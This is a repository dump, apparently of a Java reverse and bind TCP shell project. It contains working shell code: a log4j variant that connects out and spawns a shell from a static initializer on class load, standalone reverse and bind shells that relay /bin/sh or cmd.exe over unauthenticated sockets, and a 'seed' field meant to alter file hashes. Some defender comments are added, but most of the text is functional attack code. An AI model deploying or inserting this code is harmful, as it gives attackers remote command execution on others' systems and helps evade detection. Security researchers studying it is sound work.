41 | private static void brw(InputStream input, OutputStream output, String iname, String oname) {
42 | int bytes = 0;
43 | try {
44 | do {
45 | if (os.equals("WINDOWS") && iname.equals("STDOUT") && clen > 0) {
46 | // for some reason Windows OS pipes STDIN into STDOUT
47 | // we do not like that
48 | // we need to discard the data from the stream
49 | do { // reads up to clen bytes (at most one buffer at a time) and does not forward them
50 | bytes = input.read(buffer, 0, clen >= buffer.length ? buffer.length : clen);
51 | clen -= clen >= buffer.length ? buffer.length : clen;
52 | } while (bytes > 0 && clen > 0);
53 | } else {
54 | bytes = input.read(buffer, 0, buffer.length);
55 | if (bytes > 0) {
56 | output.write(buffer, 0, bytes);
57 | output.flush();
58 | if (os.equals("WINDOWS") && oname.equals("STDIN")) {
59 | clen += bytes; // remember how many bytes went to the shell so the branch above can drop the same amount
60 | }
61 | } else if (iname.equals("SOCKET")) { // a socket read that returns no bytes is treated as the peer having closed the connection
62 | error = true;
63 | System.out.print("SOC_ERROR: Shell connection has been terminated\n\n");
64 | }
65 | }
66 | } while (input.available() > 0);
67 | } catch (SocketTimeoutException ex) {} catch (IOException ex) { // a read timeout (100 ms, set in run()) only means no data yet and is ignored; any other I/O error ends the session
68 | error = true;
69 | System.out.print(String.format("STRM_ERROR: Cannot read from %s or write to %s, program will now exit...\n\n", iname, oname));
70 | }
71 | }
72 | // Opens the listener, accepts one client, starts the shell and relays socket and process streams until the shell exits or brw() flags an error; the finally block always releases everything, including the listener.
73 | public static void run() {
74 | if (detect()) {
75 | ServerSocket listener = null;
76 |
77 | Socket client = null;
78 | OutputStream socin = null;
79 | InputStream socout = null;
80 |
81 | Process process = null;
82 | OutputStream stdin = null;
83 | InputStream stdout = null;
84 | InputStream stderr = null;
85 |
86 | System.out.print("Backdoor is up and running...\n\n"); // these fixed status strings go to the JVM's standard output, so they may show up in the host application's console log
87 | System.out.print("Waiting for client to connect...\n\n");
88 | try {
89 | listener = new ServerSocket(port);
90 | do {
91 | client = listener.accept(); // blocks until a client connects
92 | } while (client == null);
93 | client.setSoTimeout(100); // 100 ms read timeout, so the socket read in brw() returns regularly instead of blocking
94 | socin = client.getOutputStream();
95 | socout = client.getInputStream();
96 | // NOTE(review): no authentication or peer check happens between accept() above and the shell being started below.
97 | buffer = new byte[1024];
98 |
99 | process = new ProcessBuilder(shell).redirectInput(ProcessBuilder.Redirect.PIPE).redirectOutput(ProcessBuilder.Redirect.PIPE).redirectError(ProcessBuilder.Redirect.PIPE).start(); // child shell with all three standard streams piped to this JVM
100 | stdin = process.getOutputStream();
101 | stdout = process.getInputStream();
102 | stderr = process.getErrorStream();
103 |
104 | System.out.print("Client has connected!\n\n");
105 | do { // single-threaded polling loop: socket to STDIN first, then STDERR and STDOUT back to the socket when they have data
106 | if (!process.isAlive()) {
107 | System.out.print("PROC_ERROR: Shell process has been terminated\n\n"); break;
108 | }
109 | brw(socout, stdin, "SOCKET", "STDIN");
110 | if (stderr.available() > 0) { brw(stderr, socin, "STDERR", "SOCKET"); }
111 | if (stdout.available() > 0) { brw(stdout, socin, "STDOUT", "SOCKET"); }
112 | } while (!error);
113 | System.out.print("Client has disconnected!\n");
114 | } catch (IOException ex) {
115 | System.out.print(String.format("ERROR: %s\n", ex.getMessage()));
116 | } finally { // close failures are deliberately ignored so that every remaining resource is still released
117 | if (stdin != null) { try { stdin.close() ; } catch (IOException ex) {} }
118 | if (stdout != null) { try { stdout.close(); } catch (IOException ex) {} }
119 | if (stderr != null) { try { stderr.close(); } catch (IOException ex) {} }
120 | if (process != null) { process.destroy(); }
121 |
122 | if (socin != null) { try { socin.close() ; } catch (IOException ex) {} }
123 | if (socout != null) { try { socout.close(); } catch (IOException ex) {} }
124 | if (client != null) { try { client.close(); } catch (IOException ex) {} }
125 |
126 | if (buffer != null) { Arrays.fill(buffer, (byte)0); } // overwrites the relayed bytes still held in the buffer
127 |
128 | if (listener != null) { try { listener.close(); } catch (IOException ex) {} } // the listener is closed after the single session; run() does not loop back to accept()
129 | }
130 | }
131 | }
132 |
133 | static { // runs once, when the class is initialised
134 | run();
135 | System.gc(); // only a suggestion to the JVM; collection is not guaranteed
136 | }
137 |
138 | }
139 |
--------------------------------------------------------------------------------
/log4j/ReverseShell.java:
--------------------------------------------------------------------------------
1 | // Copyright (c) 2021 Ivan Šincek
2 | // v2.9
3 | // Requires Java SE v8 or greater and JDK v8 or greater.
4 | // Works on Linux OS, macOS, and Windows OS.
5 |
6 | import java.io.IOException;
7 | import java.io.InputStream;
8 | import java.io.OutputStream;
9 | import java.net.InetSocketAddress;
10 | import java.net.Socket;
11 | import java.net.SocketTimeoutException;
12 | import java.util.Arrays;
13 |
/**
 * Reverse TCP shell that runs from a static initializer (see the bottom of the class): it
 * connects out to {@code addr}, starts the platform shell and relays raw bytes between the
 * socket and the shell's stdin/stdout/stderr.
 *
 * <p>Defender notes, all visible in this file: the JVM opens an outbound TCP connection and
 * then spawns {@code /bin/sh} or {@code cmd.exe} as a child process with all three streams
 * piped; the bytes are copied unchanged over a plain {@link Socket}, so the session is not
 * encrypted on the wire; the status strings below are written to the JVM's standard output.
 * All state is static, so there is one session per class initialization.
 */
public class ReverseShell {

    // change the host address and/or port number as necessary
    private static InetSocketAddress addr = new InetSocketAddress("127.0.0.1", 9000);
    // set by detect(): "LINUX" or "WINDOWS" when the platform is supported
    private static String os = null;
    // set by detect(): "/bin/sh" or "cmd.exe"
    private static String shell = null;
    // single relay buffer shared by every brw() call; allocated (1024 bytes) in run()
    private static byte[] buffer = null;
    // Windows only: count of bytes written to the shell's stdin that brw() still has to
    // discard from the shell's stdout
    private static int clen = 0;
    // set to true by brw() to end the relay loop in run()
    private static boolean error = false;

    /**
     * Chooses the shell from the {@code os.name} system property (upper-cased first).
     *
     * @return {@code true} if the name contains LINUX, MAC or WIN; {@code false} otherwise,
     *         after printing a SYS_ERROR line
     */
    private static boolean detect() {
        boolean detected = true;
        os = System.getProperty("os.name").toUpperCase();
        if (os.contains("LINUX") || os.contains("MAC")) {
            // macOS is folded into the "LINUX" case: both use /bin/sh
            os = "LINUX";
            shell = "/bin/sh";
        } else if (os.contains("WIN")) {
            os = "WINDOWS";
            shell = "cmd.exe";
        } else {
            detected = false;
            System.out.print("SYS_ERROR: Underlying operating system is not supported, program will now exit...\n");
        }
        return detected;
    }

    /**
     * Copies what is currently readable from {@code input} to {@code output} through the shared
     * byte buffer, repeating while {@code input.available()} reports more data.
     *
     * @param input  stream to read from
     * @param output stream to write to
     * @param iname  label of the input ("SOCKET", "STDOUT" or "STDERR" at the call sites);
     *               selects the Windows discard path and the disconnect check
     * @param oname  label of the output ("STDIN" or "SOCKET" at the call sites)
     */
    // strings in Java are immutable, so we need to avoid using them to minimize the data in memory
    private static void brw(InputStream input, OutputStream output, String iname, String oname) {
        int bytes = 0;
        try {
            do {
                if (os.equals("WINDOWS") && iname.equals("STDOUT") && clen > 0) {
                    // for some reason Windows OS pipes STDIN into STDOUT
                    // we do not like that
                    // we need to discard the data from the stream
                    do {
                        // read at most clen bytes (capped at the buffer size) and drop them
                        bytes = input.read(buffer, 0, clen >= buffer.length ? buffer.length : clen);
                        clen -= clen >= buffer.length ? buffer.length : clen;
                    } while (bytes > 0 && clen > 0);
                } else {
                    bytes = input.read(buffer, 0, buffer.length);
                    if (bytes > 0) {
                        // bytes are forwarded exactly as read: no framing, encoding or encryption
                        output.write(buffer, 0, bytes);
                        output.flush();
                        if (os.equals("WINDOWS") && oname.equals("STDIN")) {
                            // remember how much was sent to the shell so the echo can be discarded
                            clen += bytes;
                        }
                    } else if (iname.equals("SOCKET")) {
                        // a non-positive read on the socket is treated as the peer having closed
                        error = true;
                        System.out.print("SOC_ERROR: Shell connection has been terminated\n\n");
                    }
                }
            } while (input.available() > 0);
        // a read timeout only means "no data yet" and is ignored; any other I/O error ends the session
        } catch (SocketTimeoutException ex) {} catch (IOException ex) {
            error = true;
            System.out.print(String.format("STRM_ERROR: Cannot read from %s or write to %s, program will now exit...\n\n", iname, oname));
        }
    }

    /**
     * Connects to {@code addr}, starts the shell and relays data until the shell process ends
     * or brw() sets {@code error}. Does nothing if detect() reports an unsupported platform.
     * Every stream, the socket and the process are closed or destroyed in the finally block.
     */
    public static void run() {
        if (detect()) {
            Socket client = null;
            OutputStream socin = null;  // socket output: data going to the remote peer
            InputStream socout = null;  // socket input: data coming from the remote peer

            Process process = null;
            OutputStream stdin = null;
            InputStream stdout = null;
            InputStream stderr = null;

            try {
                client = new Socket();
                // 100 ms read timeout, so the socket read in brw() cannot block the loop for long
                client.setSoTimeout(100);
                client.connect(addr);
                socin = client.getOutputStream();
                socout = client.getInputStream();

                buffer = new byte[1024];

                // the shell is started with no arguments and with stdin, stdout and stderr all piped to this JVM
                process = new ProcessBuilder(shell).redirectInput(ProcessBuilder.Redirect.PIPE).redirectOutput(ProcessBuilder.Redirect.PIPE).redirectError(ProcessBuilder.Redirect.PIPE).start();
                stdin = process.getOutputStream();
                stdout = process.getInputStream();
                stderr = process.getErrorStream();

                System.out.print("Backdoor is up and running...\n\n");
                // polling loop: socket -> shell stdin, then shell stderr/stdout -> socket
                do {
                    if (!process.isAlive()) {
                        System.out.print("PROC_ERROR: Shell process has been terminated\n\n"); break;
                    }
                    brw(socout, stdin, "SOCKET", "STDIN");
                    // process streams are read only when data is available
                    if (stderr.available() > 0) { brw(stderr, socin, "STDERR", "SOCKET"); }
                    if (stdout.available() > 0) { brw(stdout, socin, "STDOUT", "SOCKET"); }
                } while (!error);
                System.out.print("Backdoor will now exit...\n");
            } catch (IOException ex) {
                System.out.print(String.format("ERROR: %s\n", ex.getMessage()));
            } finally {
                // best-effort cleanup: failures while closing are deliberately ignored
                if (stdin != null) { try { stdin.close() ; } catch (IOException ex) {} }
                if (stdout != null) { try { stdout.close(); } catch (IOException ex) {} }
                if (stderr != null) { try { stderr.close(); } catch (IOException ex) {} }
                if (process != null) { process.destroy(); }

                if (socin != null) { try { socin.close() ; } catch (IOException ex) {} }
                if (socout != null) { try { socout.close(); } catch (IOException ex) {} }
                if (client != null) { try { client.close(); } catch (IOException ex) {} }

                // the relay buffer is overwritten with zeros, so the last relayed bytes do not
                // remain in it (relevant when examining a heap dump of the process)
                if (buffer != null) { Arrays.fill(buffer, (byte)0); }
            }
        }
    }

    // Static initializer: the JVM executes this block once, when the class is initialized, so
    // run() starts without a main() method or any explicit call from the loading code.
    // Defender note: loading and initializing this class is by itself enough to trigger the
    // outbound connection.
    static {
        run();
        // requests a garbage collection after run() returns; the JVM may ignore the request
        System.gc();
    }

}
131 |
--------------------------------------------------------------------------------
/src/Bind Shell/build.xml:
--------------------------------------------------------------------------------
11 | Builds, tests, and runs the project Bind Shell.
--------------------------------------------------------------------------------
/src/Bind Shell/manifest.mf:
--------------------------------------------------------------------------------
1 | Manifest-Version: 1.0
2 | X-COMMENT: Main-Class will be added automatically by build
3 |
4 |
--------------------------------------------------------------------------------
/src/Bind Shell/nbproject/genfiles.properties:
--------------------------------------------------------------------------------
1 | build.xml.data.CRC32=77abda24
2 | build.xml.script.CRC32=35915082
3 | build.xml.stylesheet.CRC32=f85dc8f2@1.97.0.48
4 | # This file is used by a NetBeans-based IDE to track changes in generated files such as build-impl.xml.
5 | # Do not edit this file. You may delete it but then the IDE will never regenerate such files for you.
6 | nbproject/build-impl.xml.data.CRC32=77abda24
7 | nbproject/build-impl.xml.script.CRC32=97bfe66b
8 | nbproject/build-impl.xml.stylesheet.CRC32=12e0a6c2@1.106.0.48
9 |
--------------------------------------------------------------------------------
/src/Bind Shell/nbproject/project.properties:
--------------------------------------------------------------------------------
1 | annotation.processing.enabled=true
2 | annotation.processing.enabled.in.editor=false
3 | annotation.processing.processors.list=
4 | annotation.processing.run.all.processors=true
5 | annotation.processing.source.output=${build.generated.sources.dir}/ap-source-output
6 | application.title=Bind Shell
7 | application.vendor=W10
8 | build.classes.dir=${build.dir}/classes
9 | build.classes.excludes=**/*.java,**/*.form
10 | # This directory is removed when the project is cleaned:
11 | build.dir=build
12 | build.generated.dir=${build.dir}/generated
13 | build.generated.sources.dir=${build.dir}/generated-sources
14 | # Only compile against the classpath explicitly listed here:
15 | build.sysclasspath=ignore
16 | build.test.classes.dir=${build.dir}/test/classes
17 | build.test.results.dir=${build.dir}/test/results
18 | # Uncomment to specify the preferred debugger connection transport:
19 | #debug.transport=dt_socket
20 | debug.classpath=\
21 | ${run.classpath}
22 | debug.modulepath=\
23 | ${run.modulepath}
24 | debug.test.classpath=\
25 | ${run.test.classpath}
26 | debug.test.modulepath=\
27 | ${run.test.modulepath}
28 | # Files in build.classes.dir which should be excluded from distribution jar
29 | dist.archive.excludes=
30 | # This directory is removed when the project is cleaned:
31 | dist.dir=dist
32 | dist.jar=${dist.dir}/Bind_Shell.jar
33 | dist.javadoc.dir=${dist.dir}/javadoc
34 | dist.jlink.dir=${dist.dir}/jlink
35 | dist.jlink.output=${dist.jlink.dir}/Bind_Shell
36 | endorsed.classpath=
37 | excludes=
38 | includes=**
39 | jar.compress=false
40 | javac.classpath=
41 | # Space-separated list of extra javac options
42 | javac.compilerargs=
43 | javac.deprecation=false
44 | javac.external.vm=true
45 | javac.modulepath=
46 | javac.processormodulepath=
47 | javac.processorpath=\
48 | ${javac.classpath}
49 | javac.source=1.8
50 | javac.target=1.8
51 | javac.test.classpath=\
52 | ${javac.classpath}:\
53 | ${build.classes.dir}
54 | javac.test.modulepath=\
55 | ${javac.modulepath}
56 | javac.test.processorpath=\
57 | ${javac.test.classpath}
58 | javadoc.additionalparam=
59 | javadoc.author=false
60 | javadoc.encoding=${source.encoding}
61 | javadoc.html5=false
62 | javadoc.noindex=false
63 | javadoc.nonavbar=false
64 | javadoc.notree=false
65 | javadoc.private=false
66 | javadoc.splitindex=true
67 | javadoc.use=true
68 | javadoc.version=false
69 | javadoc.windowtitle=
70 | # The jlink additional root modules to resolve
71 | jlink.additionalmodules=
72 | # The jlink additional command line parameters
73 | jlink.additionalparam=
74 | jlink.launcher=true
75 | jlink.launcher.name=Bind_Shell
76 | main.class=bind.shell.BindShell
77 | manifest.file=manifest.mf
78 | meta.inf.dir=${src.dir}/META-INF
79 | mkdist.disabled=false
80 | platform.active=default_platform
81 | run.classpath=\
82 | ${javac.classpath}:\
83 | ${build.classes.dir}
84 | # Space-separated list of JVM arguments used when running the project.
85 | # You may also define separate properties like run-sys-prop.name=value instead of -Dname=value.
86 | # To set system properties for unit tests define test-sys-prop.name=value:
87 | run.jvmargs=
88 | run.modulepath=\
89 | ${javac.modulepath}
90 | run.test.classpath=\
91 | ${javac.test.classpath}:\
92 | ${build.test.classes.dir}
93 | run.test.modulepath=\
94 | ${javac.test.modulepath}
95 | source.encoding=UTF-8
96 | src.dir=src
97 | test.src.dir=test
98 |
--------------------------------------------------------------------------------
/src/Bind Shell/nbproject/project.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 | org.netbeans.modules.java.j2seproject
4 |
5 |
6 | Bind Shell
--------------------------------------------------------------------------------
/src/Bind Shell/src/bind/shell/BindShell.java:
--------------------------------------------------------------------------------
1 | // Copyright (c) 2021 Ivan Šincek
2 | // Requires Java SE v8 or greater and JDK v8 or greater.
3 | // Works on Linux OS, macOS, and Windows OS.
4 | package bind.shell;
5 |
6 | import java.io.IOException;
7 | import java.io.InputStream;
8 | import java.io.OutputStream;
9 | import java.net.ServerSocket;
10 | import java.net.Socket;
11 | import java.net.SocketTimeoutException;
12 | import java.util.Arrays;
13 |
/**
 * Bind TCP shell: listens on a port, accepts one client, starts the platform shell and relays
 * raw bytes between the client socket and the shell's stdin/stdout/stderr.
 *
 * <p>Defender notes, all visible in this file: the JVM opens a listening TCP socket and, once a
 * client connects, spawns {@code /bin/sh} or {@code cmd.exe} as a child process with all three
 * streams piped; there is no authentication step between accept() and starting the shell, and
 * the bytes are copied unchanged over a plain socket, so the session is not encrypted on the
 * wire; the status strings below are written to the JVM's standard output.
 */
public class BindShell {

    // NOTE: Change seed to help you change the file hash.
    // Defender note: this field is never read anywhere in the class. Per the author's note its
    // only effect is on the compiled file's hash, so a file hash alone is a weak indicator for
    // this program; the behaviour described in the class comment does not depend on it.
    private String seed = "3301Kira";
    // TCP port to listen on; set by the constructor
    private int port = -1;
    // set by detect(): "LINUX" or "WINDOWS" when the platform is supported
    private String os = null;
    // set by detect(): "/bin/sh" or "cmd.exe"
    private String shell = null;
    // single relay buffer shared by every brw() call; allocated (1024 bytes) in run()
    private byte[] buffer = null;
    // Windows only: count of bytes written to the shell's stdin that brw() still has to
    // discard from the shell's stdout
    private int clen = 0;
    // set to true by brw() to end the relay loop in run()
    private boolean error = false;

    /**
     * @param port TCP port the listener will bind to; main() accepts 0 to 65535
     */
    public BindShell(int port) {
        this.port = port;
    }

    /**
     * Chooses the shell from the {@code os.name} system property (upper-cased first).
     *
     * @return {@code true} if the name contains LINUX, MAC or WIN; {@code false} otherwise,
     *         after printing a SYS_ERROR line
     */
    private boolean detect() {
        boolean detected = true;
        this.os = System.getProperty("os.name").toUpperCase();
        if (this.os.contains("LINUX") || this.os.contains("MAC")) {
            // macOS is folded into the "LINUX" case: both use /bin/sh
            this.os = "LINUX";
            this.shell = "/bin/sh";
        } else if (this.os.contains("WIN")) {
            this.os = "WINDOWS";
            this.shell = "cmd.exe";
        } else {
            detected = false;
            System.out.print("SYS_ERROR: Underlying operating system is not supported, program will now exit...\n");
        }
        return detected;
    }

    /**
     * Copies what is currently readable from {@code input} to {@code output} through the shared
     * byte buffer, repeating while {@code input.available()} reports more data.
     *
     * @param input  stream to read from
     * @param output stream to write to
     * @param iname  label of the input ("SOCKET", "STDOUT" or "STDERR" at the call sites);
     *               selects the Windows discard path and the disconnect check
     * @param oname  label of the output ("STDIN" or "SOCKET" at the call sites)
     */
    // strings in Java are immutable, so we need to avoid using them to minimize the data in memory
    private void brw(InputStream input, OutputStream output, String iname, String oname) {
        int bytes = 0;
        try {
            do {
                if (this.os.equals("WINDOWS") && iname.equals("STDOUT") && this.clen > 0) {
                    // for some reason Windows OS pipes STDIN into STDOUT
                    // we do not like that
                    // we need to discard the data from the stream
                    do {
                        // read at most clen bytes (capped at the buffer size) and drop them
                        bytes = input.read(this.buffer, 0, this.clen >= this.buffer.length ? this.buffer.length : this.clen);
                        this.clen -= this.clen >= this.buffer.length ? this.buffer.length : this.clen;
                    } while (bytes > 0 && this.clen > 0);
                } else {
                    bytes = input.read(this.buffer, 0, this.buffer.length);
                    if (bytes > 0) {
                        // bytes are forwarded exactly as read: no framing, encoding or encryption
                        output.write(this.buffer, 0, bytes);
                        output.flush();
                        if (this.os.equals("WINDOWS") && oname.equals("STDIN")) {
                            // remember how much was sent to the shell so the echo can be discarded
                            this.clen += bytes;
                        }
                    } else if (iname.equals("SOCKET")) {
                        // a non-positive read on the socket is treated as the client having closed
                        this.error = true;
                        System.out.print("SOC_ERROR: Shell connection has been terminated\n\n");
                    }
                }
            } while (input.available() > 0);
        // a read timeout only means "no data yet" and is ignored; any other I/O error ends the session
        } catch (SocketTimeoutException ex) {} catch (IOException ex) {
            this.error = true;
            System.out.print(String.format("STRM_ERROR: Cannot read from %s or write to %s, program will now exit...\n\n", iname, oname));
        }
    }

    /**
     * Listens on {@code port}, serves a single client and then shuts everything down, including
     * the listener. Does nothing if detect() reports an unsupported platform. The relay ends
     * when the shell process exits or brw() sets {@code error}.
     */
    public void run() {
        if (this.detect()) {
            ServerSocket listener = null;

            Socket client = null;
            OutputStream socin = null;  // socket output: data going to the client
            InputStream socout = null;  // socket input: data coming from the client

            Process process = null;
            OutputStream stdin = null;
            InputStream stdout = null;
            InputStream stderr = null;

            System.out.print("Backdoor is up and running...\n\n");
            System.out.print("Waiting for client to connect...\n\n");
            try {
                // only a port is given, so the listener is not restricted to one local address
                listener = new ServerSocket(this.port);
                // accept() blocks until a client connects; whoever connects first gets the session
                do {
                    client = listener.accept();
                } while (client == null);
                // 100 ms read timeout, so the socket read in brw() cannot block the loop for long
                client.setSoTimeout(100);
                socin = client.getOutputStream();
                socout = client.getInputStream();

                this.buffer = new byte[1024];

                // the shell is started with no arguments and with stdin, stdout and stderr all piped to this JVM
                process = new ProcessBuilder(this.shell).redirectInput(ProcessBuilder.Redirect.PIPE).redirectOutput(ProcessBuilder.Redirect.PIPE).redirectError(ProcessBuilder.Redirect.PIPE).start();
                stdin = process.getOutputStream();
                stdout = process.getInputStream();
                stderr = process.getErrorStream();

                System.out.print("Client has connected!\n\n");
                // polling loop: socket -> shell stdin, then shell stderr/stdout -> socket
                do {
                    if (!process.isAlive()) {
                        System.out.print("PROC_ERROR: Shell process has been terminated\n\n"); break;
                    }
                    this.brw(socout, stdin, "SOCKET", "STDIN");
                    // process streams are read only when data is available
                    if (stderr.available() > 0) { this.brw(stderr, socin, "STDERR", "SOCKET"); }
                    if (stdout.available() > 0) { this.brw(stdout, socin, "STDOUT", "SOCKET"); }
                } while (!this.error);
                System.out.print("Client has disconnected!\n");
            } catch (IOException ex) {
                System.out.print(String.format("ERROR: %s\n", ex.getMessage()));
            } finally {
                // best-effort cleanup: failures while closing are deliberately ignored
                if (stdin != null) { try { stdin.close() ; } catch (IOException ex) {} }
                if (stdout != null) { try { stdout.close(); } catch (IOException ex) {} }
                if (stderr != null) { try { stderr.close(); } catch (IOException ex) {} }
                if (process != null) { process.destroy(); }

                if (socin != null) { try { socin.close() ; } catch (IOException ex) {} }
                if (socout != null) { try { socout.close(); } catch (IOException ex) {} }
                if (client != null) { try { client.close(); } catch (IOException ex) {} }

                // the relay buffer is overwritten with zeros, so the last relayed bytes do not
                // remain in it (relevant when examining a heap dump of the process)
                if (this.buffer != null) { Arrays.fill(this.buffer, (byte)0); }

                if (listener != null) { try { listener.close(); } catch (IOException ex) {} }
            }
        }
    }

    /**
     * Command-line entry point: expects exactly one argument, the port number, validates it
     * (integer, 0 to 65535) and runs one BindShell session.
     *
     * @param args command-line arguments; args[0] is the port
     */
    public static void main(String[] args) {
        System.out.print("Java Bind TCP v3.0 by Ivan Sincek.\n");
        System.out.print("GitHub repository at github.com/ivan-sincek/java-reverse-tcp.\n");
        if (args.length != 1) {
            // NOTE(review): the usage text names no argument after the jar; a placeholder for
            // the port was presumably lost when this listing was rendered
            System.out.print("Usage: java -jar Bind_Shell.jar \n");
        } else {
            boolean error = false;
            int port = -1;
            args[0] = args[0].trim();
            if (args[0].length() < 1) {
                error = true;
                System.out.print("Port number is required\n");
            } else {
                try {
                    port = Integer.parseInt(args[0]);
                    if (port < 0 || port > 65535) {
                        error = true;
                        System.out.print("Port number is out of range\n");
                    }
                } catch (NumberFormatException ex) {
                    error = true;
                    System.out.print("Port number is not valid\n");
                }
            }
            if (!error) {
                BindShell sh = new BindShell(port);
                sh.run();
                // drop the only reference and request a collection; the JVM may ignore the request
                sh = null;
                System.gc();
            }
        }
    }

}
172 |
--------------------------------------------------------------------------------
/src/Reverse Shell/build.xml:
--------------------------------------------------------------------------------
11 | Builds, tests, and runs the project Reverse Shell.
--------------------------------------------------------------------------------
/src/Reverse Shell/manifest.mf:
--------------------------------------------------------------------------------
1 | Manifest-Version: 1.0
2 | X-COMMENT: Main-Class will be added automatically by build
3 |
4 |
--------------------------------------------------------------------------------
/src/Reverse Shell/nbproject/genfiles.properties:
--------------------------------------------------------------------------------
1 | build.xml.data.CRC32=1c441c1a
2 | build.xml.script.CRC32=1840a205
3 | build.xml.stylesheet.CRC32=f85dc8f2@1.97.0.48
4 | # This file is used by a NetBeans-based IDE to track changes in generated files such as build-impl.xml.
5 | # Do not edit this file. You may delete it but then the IDE will never regenerate such files for you.
6 | nbproject/build-impl.xml.data.CRC32=1c441c1a
7 | nbproject/build-impl.xml.script.CRC32=fcb02f45
8 | nbproject/build-impl.xml.stylesheet.CRC32=12e0a6c2@1.106.0.48
9 |
--------------------------------------------------------------------------------
/src/Reverse Shell/nbproject/project.properties:
--------------------------------------------------------------------------------
1 | annotation.processing.enabled=true
2 | annotation.processing.enabled.in.editor=false
3 | annotation.processing.processors.list=
4 | annotation.processing.run.all.processors=true
5 | annotation.processing.source.output=${build.generated.sources.dir}/ap-source-output
6 | application.title=Reverse Shell
7 | application.vendor=Kira
8 | build.classes.dir=${build.dir}/classes
9 | build.classes.excludes=**/*.java,**/*.form
10 | # This directory is removed when the project is cleaned:
11 | build.dir=build
12 | build.generated.dir=${build.dir}/generated
13 | build.generated.sources.dir=${build.dir}/generated-sources
14 | # Only compile against the classpath explicitly listed here:
15 | build.sysclasspath=ignore
16 | build.test.classes.dir=${build.dir}/test/classes
17 | build.test.results.dir=${build.dir}/test/results
18 | # Uncomment to specify the preferred debugger connection transport:
19 | #debug.transport=dt_socket
20 | debug.classpath=\
21 | ${run.classpath}
22 | debug.modulepath=\
23 | ${run.modulepath}
24 | debug.test.classpath=\
25 | ${run.test.classpath}
26 | debug.test.modulepath=\
27 | ${run.test.modulepath}
28 | # Files in build.classes.dir which should be excluded from distribution jar
29 | dist.archive.excludes=
30 | # This directory is removed when the project is cleaned:
31 | dist.dir=dist
32 | dist.jar=${dist.dir}/Reverse_Shell.jar
33 | dist.javadoc.dir=${dist.dir}/javadoc
34 | dist.jlink.dir=${dist.dir}/jlink
35 | dist.jlink.output=${dist.jlink.dir}/Reverse_Shell
36 | endorsed.classpath=
37 | excludes=
38 | includes=**
39 | jar.compress=false
40 | javac.classpath=
41 | # Space-separated list of extra javac options
42 | javac.compilerargs=
43 | javac.deprecation=false
44 | javac.external.vm=true
45 | javac.modulepath=
46 | javac.processormodulepath=
47 | javac.processorpath=\
48 | ${javac.classpath}
49 | javac.source=1.8
50 | javac.target=1.8
51 | javac.test.classpath=\
52 | ${javac.classpath}:\
53 | ${build.classes.dir}
54 | javac.test.modulepath=\
55 | ${javac.modulepath}
56 | javac.test.processorpath=\
57 | ${javac.test.classpath}
58 | javadoc.additionalparam=
59 | javadoc.author=false
60 | javadoc.encoding=${source.encoding}
61 | javadoc.html5=false
62 | javadoc.noindex=false
63 | javadoc.nonavbar=false
64 | javadoc.notree=false
65 | javadoc.private=false
66 | javadoc.splitindex=true
67 | javadoc.use=true
68 | javadoc.version=false
69 | javadoc.windowtitle=
70 | # The jlink additional root modules to resolve
71 | jlink.additionalmodules=
72 | # The jlink additional command line parameters
73 | jlink.additionalparam=
74 | jlink.launcher=true
75 | jlink.launcher.name=Reverse_Shell
76 | main.class=reverse.shell.ReverseShell
77 | manifest.file=manifest.mf
78 | meta.inf.dir=${src.dir}/META-INF
79 | mkdist.disabled=false
80 | platform.active=default_platform
81 | run.classpath=\
82 | ${javac.classpath}:\
83 | ${build.classes.dir}
84 | # Space-separated list of JVM arguments used when running the project.
85 | # You may also define separate properties like run-sys-prop.name=value instead of -Dname=value.
86 | # To set system properties for unit tests define test-sys-prop.name=value:
87 | run.jvmargs=
88 | run.modulepath=\
89 | ${javac.modulepath}
90 | run.test.classpath=\
91 | ${javac.test.classpath}:\
92 | ${build.test.classes.dir}
93 | run.test.modulepath=\
94 | ${javac.test.modulepath}
95 | source.encoding=UTF-8
96 | src.dir=src
97 | test.src.dir=test
98 |
--------------------------------------------------------------------------------
/src/Reverse Shell/nbproject/project.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 | org.netbeans.modules.java.j2seproject
4 |
5 |
6 | Reverse Shell
--------------------------------------------------------------------------------
/src/Reverse Shell/src/reverse/shell/ReverseShell.java:
--------------------------------------------------------------------------------
1 | // Copyright (c) 2021 Ivan Šincek
2 | // Requires Java SE v8 or greater and JDK v8 or greater.
3 | // Works on Linux OS, macOS, and Windows OS.
4 | package reverse.shell;
5 |
6 | import java.io.IOException;
7 | import java.io.InputStream;
8 | import java.io.OutputStream;
9 | import java.net.InetSocketAddress;
10 | import java.net.Socket;
11 | import java.net.SocketTimeoutException;
12 | import java.util.Arrays;
13 |
/**
 * Reverse TCP shell: connects out to the address given on the command line, starts the
 * platform shell and relays raw bytes between the socket and the shell's stdin/stdout/stderr.
 *
 * <p>Defender notes, all visible in this file: the JVM opens an outbound TCP connection and
 * then spawns {@code /bin/sh} or {@code cmd.exe} as a child process with all three streams
 * piped; the bytes are copied unchanged over a plain {@link Socket}, so the session is not
 * encrypted on the wire; the status strings below are written to the JVM's standard output.
 */
public class ReverseShell {

    // NOTE: Change seed to help you change the file hash.
    // Defender note: this field is never read anywhere in the class. Per the author's note its
    // only effect is on the compiled file's hash, so a file hash alone is a weak indicator for
    // this program; the behaviour described in the class comment does not depend on it.
    private String seed = "3301Kira";
    // remote endpoint to connect to; built by the constructor
    private InetSocketAddress addr = null;
    // set by detect(): "LINUX" or "WINDOWS" when the platform is supported
    private String os = null;
    // set by detect(): "/bin/sh" or "cmd.exe"
    private String shell = null;
    // single relay buffer shared by every brw() call; allocated (1024 bytes) in run()
    private byte[] buffer = null;
    // Windows only: count of bytes written to the shell's stdin that brw() still has to
    // discard from the shell's stdout
    private int clen = 0;
    // set to true by brw() to end the relay loop in run()
    private boolean error = false;

    /**
     * @param addr host name or IP address to connect to
     * @param port TCP port to connect to; main() accepts 0 to 65535
     */
    public ReverseShell(String addr, int port) {
        this.addr = new InetSocketAddress(addr, port);
    }

    /**
     * Chooses the shell from the {@code os.name} system property (upper-cased first).
     *
     * @return {@code true} if the name contains LINUX, MAC or WIN; {@code false} otherwise,
     *         after printing a SYS_ERROR line
     */
    private boolean detect() {
        boolean detected = true;
        this.os = System.getProperty("os.name").toUpperCase();
        if (this.os.contains("LINUX") || this.os.contains("MAC")) {
            // macOS is folded into the "LINUX" case: both use /bin/sh
            this.os = "LINUX";
            this.shell = "/bin/sh";
        } else if (this.os.contains("WIN")) {
            this.os = "WINDOWS";
            this.shell = "cmd.exe";
        } else {
            detected = false;
            System.out.print("SYS_ERROR: Underlying operating system is not supported, program will now exit...\n");
        }
